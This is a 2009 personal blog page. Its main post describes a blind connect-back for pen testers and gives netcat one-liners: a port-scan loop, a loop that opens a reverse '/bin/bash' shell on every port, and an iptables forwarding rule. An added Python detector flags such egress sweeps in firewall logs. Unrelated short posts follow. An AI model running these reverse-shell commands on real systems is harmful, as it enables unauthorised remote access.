Thursday, September 24, 2009

Blind Connect-back Through Restrictive Firewall

The following scenario is admittedly far-fetched. It’s unlikely that you’ll actually encounter it but you might encounter a situation that’s similar. You’re in a pen test and you’ve found a host that you can execute commands on but you can’t see the results. It should be simple enough to shovel a shell back to you but that’s not working. You know you’ve got commands running because you can send a ping command and see the pings coming to you. There might be a restrictive firewall between you and the target that isn’t letting the TCP/UDP streams through for ports you choose. If this sounds silly consider that there are systems out there that actually use RPC over email.

You can craft a port scan through simple commands that you can launch into your target. However if you can’t see the results of the scan you don’t know what port you can connect through. A minimalist port scan might look like this:

(for i in $(seq 1 65535);do nc -zw 3 $i && echo $i open;done) > scan_results

In this case we can’t see the results. You can watch a packet capture on your box and then subsequently send another command to connect to the port that got through. I’m lazy, impatient and efficiency minded. Let’s combine our scan with the shoveling.

i=1;while [ $i -lt 65535 ]; do nc -e /bin/bash $i && exit;i=$(( i + 1 ));done

So this will skip the port scan and just look for a way out. But what are you supposed to do, leave a netcat listening on every port? If you have an extra IP ( we can send every port to our netcat port. It looks something like this:

iptables -I INPUT -p tcp -m state --state NEW -d -j DNAT --to

If your netcat listener is on any TCP connection to any port on will get forwarded to your netcat listener. Blind injection could also be used to send packets to an idle host while you watch the IP IDs returned by the idle host. Essentially you can cause a remote host to start an idle scan for you to watch from your host, abstracting away your real IP.

This is all theoretical, and you’ll probably never find a situation where this is the answer. I’ve played with pieces but haven’t put it all together. I’m just the idea guy.

Update: That was fast.
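
From the defending side, the port-walking loop above leaves a distinctive trail in egress firewall logs: one internal host, one external address, destination ports climbing in order, and at most one connection allowed. The following is an added example, not code from the original post; the log layout, the FW-DROP / FW-ACCEPT prefixes, the thresholds and all function names are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict

# Assumed log shape: "<epoch> <prefix> ... SRC= DST= ... PROTO=TCP ... DPT=".
# The FW-DROP / FW-ACCEPT prefixes are a hypothetical --log-prefix convention.
LINE = re.compile(r"^(?P<ts>\d+) (?P<verdict>FW-DROP|FW-ACCEPT) .*?SRC=(?P<src>\S+) "
                  r"DST=(?P<dst>\S+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+)")

def find_egress_sweeps(lines, min_ports=20, window=60, min_ascending=0.9):
    """Flag a host walking ports upward against one address; list ports let out."""
    flows = defaultdict(list)              # (src, dst) -> [(ts, dpt, verdict)]
    for line in lines:
        m = LINE.match(line)
        if m:                              # skip lines that do not parse
            flows[(m["src"], m["dst"])].append((int(m["ts"]), int(m["dpt"]), m["verdict"]))
    findings = []
    for (src, dst), ev in flows.items():
        ev.sort(key=lambda e: e[0])        # stable: keeps log order within a second
        lo = 0
        for hi in range(len(ev)):
            while ev[hi][0] - ev[lo][0] > window:
                lo += 1                    # slide the window start forward
            ports = [p for _, p, _ in ev[lo:hi + 1]]
            if len(set(ports)) < min_ports:
                continue
            rising = sum(b > a for a, b in zip(ports, ports[1:]))
            if rising / max(len(ports) - 1, 1) >= min_ascending:
                tail = ev[lo:]             # everything from the sweep's start
                findings.append({
                    "src": src, "dst": dst, "first_port": ports[0],
                    "ports_tried": len({p for _, p, _ in tail}),
                    "allowed": sorted({p for _, p, v in tail if v == "FW-ACCEPT"})})
                break                      # one finding per (src, dst) pair
    return findings

def sample_log():
    """Constructed data: 10.0.0.5 walks ports 1..443; 10.0.0.9 is plain HTTPS."""
    out = []
    for port in range(1, 444):
        verdict = "FW-ACCEPT" if port == 443 else "FW-DROP"
        out.append(f"{1000 + port} {verdict} IN=eth1 OUT=eth0 SRC=10.0.0.5 "
                   f"DST=203.0.113.7 PROTO=TCP SPT={40000 + port} DPT={port}")
    for i in range(30):
        out.append(f"{1000 + i * 10} FW-ACCEPT IN=eth1 OUT=eth0 SRC=10.0.0.9 "
                   f"DST=198.51.100.20 PROTO=TCP SPT={50000 + i} DPT=443")
    return out

if __name__ == "__main__":
    print(find_egress_sweeps(sample_log()))
```

The `allowed` list is the part to act on: it names the egress port that let the connection out, which is the rule to tighten.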

Life with Schizophrenia

My girlfriend has schizoaffective disorder, a disorder closely tied to schizophrenia. I found this comic which explains many of the life experiences a schizophrenia sufferer has. I thought it was worth sharing. Most people have really inaccurate perceptions of schizophrenia and this clears many of them up.

Monday, September 14, 2009

Amarok: Unsafe at any speed

crunge: I can't help but wonder why Amarok is such an unstable piece of shit
mrecho: ya, dont like the new version
crunge: The things it does it does well. What it doesn't do is... run
crunge: It's not the new version. It has always crashed just updating your library. And instead of fixing basic shit like that they're adding features
crunge: Amarok 2: Unsafe at any speed
mrecho: ive never had issues with amarok crunge ....
kaboofa: mpc :D
mrecho: even with 30+ gigs of music on it
crunge: Yeah. I have about that and it's never worked well. Not on Gentoo, not on kubuntu 32, nor kubuntu 64
mrecho: whats the main issue your having?
crunge: So I'll be browsing some websites right. Text websites, nothing with flash or sound. Amarok will be stopped, sitting in my tray. All of a sudden I get a notification saying Amarok has crashed
mrecho: wtf...
crunge: no reason I can get outside it rescanning my collection *which hasn't changed*
crunge: and it does this at random
crunge: I'm trying to add music to my girlfriend's ipod, which it seems capable of doing but when I *delete* songs it crashes.
crunge: When I launch it again it figures out that the songs are gone and I can try adding music again
crunge: and this isn't a bug it's just a retarded absence of a feature. You can add songs to a music device by finding a track and right click blah blah blah. Unless it's in your playlist. Can't do it from your playlist. So if you've got a playlist of the stuff you want, too bad
crunge: you have to find the actual playlist file and add that to your device. But it won't tell you where it actually saves the playlist. There is no Save As. Only Save.
crunge: which, it's probably in the fucking database. There's an "export" option. So you *can* export it out of Amarok so Amarok can read it in and put it on your music player
crunge: Hey! I got those songs to load. And 80% of the titles are SHA1 hashes

Friday, September 11, 2009

Unified Threat Management

Saying that an appliance provides Unified Threat Management is like saying a kevlar vest provides Complete Bodily Protection.

Bike Ride

6.2 mile ride to work with a friend. A couple of small uphills and a few large downhills. Not looking forward to the trip home.

The trip home was better than the trip there. Got into a great groove going up the hills. Helped having a fellow rider to talk with. Got home feeling really good.

12 miles total (return trip was more right turns)